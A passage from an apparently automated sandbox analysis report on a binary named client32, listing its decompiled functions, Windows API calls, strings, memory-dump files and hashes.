                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 11001011
                                                        • m_hWnd, xrefs: 11001016
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorExitKillLastMessageProcessTimerwsprintf
                                                        • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 2229609774-1557312927
                                                        • Opcode ID: 1770e36260f19dc7d9c9f2fc614e6a2aa219c11bc3183004388498927ffce4b8
                                                        • Instruction ID: 85a83e753ce2334310b605be9e6b37dc2aa326c5352e60b6a277888e17089f80
                                                        • Opcode Fuzzy Hash: 1770e36260f19dc7d9c9f2fc614e6a2aa219c11bc3183004388498927ffce4b8
                                                        • Instruction Fuzzy Hash: A7D05E77A10329BFD225DA56EC45ED6F3DDEB18368F00C429FA4557640D7B1E880CBA2
                                                        Function 1103B000 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindWindowA.USER32(NSMClassList,00000000), ref: 1103B00F
                                                        • SendMessageA.USER32(00000000,0000065B,?,?), ref: 1103B027
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FindMessageSendWindow
                                                        • String ID: NSMClassList
                                                        • API String ID: 1741975844-2474587545
                                                        • Opcode ID: 0c65c2155593c244e98b49570bad4efc5dd94f5243094f64a045e500cd371313
                                                        • Instruction ID: 412497618096f6ceebb2c8e5b1c93f20f04941736e5984ac9c6eab23f84d4a3b
                                                        • Opcode Fuzzy Hash: 0c65c2155593c244e98b49570bad4efc5dd94f5243094f64a045e500cd371313
                                                        • Instruction Fuzzy Hash: 4ED01232200624BBE6109B95DD49FA7FB9CEB89B55F058055F6199A180C661D40087A0
                                                        Function 1100D4A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetVersion.KERNEL32(1100D71E,?,00000000,?,1100CA4A,?), ref: 1100D4A9
                                                        • LoadLibraryA.KERNEL32(AudioCapture.dll,?,1100CA4A,?), ref: 1100D4B8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LibraryLoadVersion
                                                        • String ID: AudioCapture.dll
                                                        • API String ID: 3209957514-2642820777
                                                        • Opcode ID: e67a74e394a46cd4a230a294111d6738ecbe5b9cda1371316a140dce9fca34bc
                                                        • Instruction ID: 25e691207691642c4356b8f3de2543ca62ce68b30f69e8b4a8df66a417ae823a
                                                        • Opcode Fuzzy Hash: e67a74e394a46cd4a230a294111d6738ecbe5b9cda1371316a140dce9fca34bc
                                                        • Instruction Fuzzy Hash: 82E01735E215639BF7028B3A888838DB3D1B74128AFC694B0EC26C0948FB28D4409F31
                                                        Function 110150C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000,00000000,1104FCA6,00000041,00000040,00000001,0000004F,_debug,platformid,00000000), ref: 110150D7
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,1116F448,000000FF,?,1105018C), ref: 110150E8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseCreateFileHandle
                                                        • String ID: \\.\NSWFPDrv
                                                        • API String ID: 3498533004-85019792
                                                        • Opcode ID: 6231527e6390726173594491354c6e4cd092e0601a9bcb34ddaadc10646ea3e9
                                                        • Instruction ID: 75e221cb1509f29626dfc12a380aed5e2f5bc3ba1cdec89b9f211e34a1aec4b9
                                                        • Opcode Fuzzy Hash: 6231527e6390726173594491354c6e4cd092e0601a9bcb34ddaadc10646ea3e9
                                                        • Instruction Fuzzy Hash: F3D0C972A020347EE27116AAAC4CFCBBE09DB037B5F294264FA2EE55C4A6544C4186F0
                                                        Function 1100D770 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(111D89EC,00000000,?,?,1100C13B,00000000,00000000), ref: 1100D77F
                                                        • LeaveCriticalSection.KERNEL32(111D89EC,?,?,1100C13B,00000000,00000000), ref: 1100D7F0
                                                          • Part of subcall function 1100D6E0: EnterCriticalSection.KERNEL32(111D89EC,1100CA4A,?,1100B4AC,?,00000000,?,1100CA4A,?), ref: 1100D6E9
                                                          • Part of subcall function 1100D6E0: LeaveCriticalSection.KERNEL32(111D89EC,1100B4AC,?,00000000,?,1100CA4A,?), ref: 1100D761
                                                        • LeaveCriticalSection.KERNEL32(111D89EC), ref: 1100D7BF
                                                        • LeaveCriticalSection.KERNEL32(111D89EC), ref: 1100D7DB
                                                          • Part of subcall function 1100D690: EnterCriticalSection.KERNEL32(111D89EC,1100C3CB), ref: 1100D695
                                                          • Part of subcall function 1100D690: LeaveCriticalSection.KERNEL32(111D89EC), ref: 1100D6CF
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$Leave$Enter
                                                        • String ID:
                                                        • API String ID: 2978645861-0
                                                        • Opcode ID: aca24964a8334ab7ee8cd89ad2ace1eb3ed66267a62d89fe4e8a6cc7f4fed172
                                                        • Instruction ID: 0dafe6cd7310c593e9f50b724afca6883deab30faa1009faaa9d0ca0fe2b91f1
                                                        • Opcode Fuzzy Hash: aca24964a8334ab7ee8cd89ad2ace1eb3ed66267a62d89fe4e8a6cc7f4fed172
                                                        • Instruction Fuzzy Hash: FC01A736F122246BDB01DFE5AC49A9DFB9CEB4A699B0441A5FC4DD3600F631AD0087F2